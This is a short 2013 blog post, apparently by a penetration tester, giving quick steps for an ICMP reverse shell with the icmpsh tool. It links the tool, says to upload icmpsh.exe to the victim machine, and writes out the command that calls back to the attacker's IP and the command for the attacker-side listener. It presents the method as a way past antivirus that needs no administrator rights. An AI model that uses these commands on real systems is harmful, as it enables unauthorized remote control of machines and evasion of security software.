Saturday 21 December 2013

ICMP Reverse Shell


Every time while penetration testing, we come across scenarios where we need to get shell on remote box, and most handy tool is Metasploit Meterpreter which most of our Smart Antiviruses detects and quickly we need some way to get around.

We can try ICMP Reverse shell, which I recently tested on my machine.
Most important thing, It don't require Administrator access to machine we can just use it on the fly.

I know there are lot of articles on ICMP shell over internet, but this is just for quick reference.

Download ICMP Shell from : https://github.com/inquisb/icmpsh

1. Upload "icmpsh.exe" on victim machine, trust me Antivirus didn't detect in my case.
2. Execute "icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128"
3. Start listener on Attacker machine with "python icmpsh_m.py <attacker's IP> <Victims IP> "
4. Or you can use listener scripts "./run.sh" which will generate Step 2 command for you, and start listener 


Exported Shell through ICMP

















Windows Shell
























For more details you can visit :

Hope this is helpful!..

No comments:

Post a Comment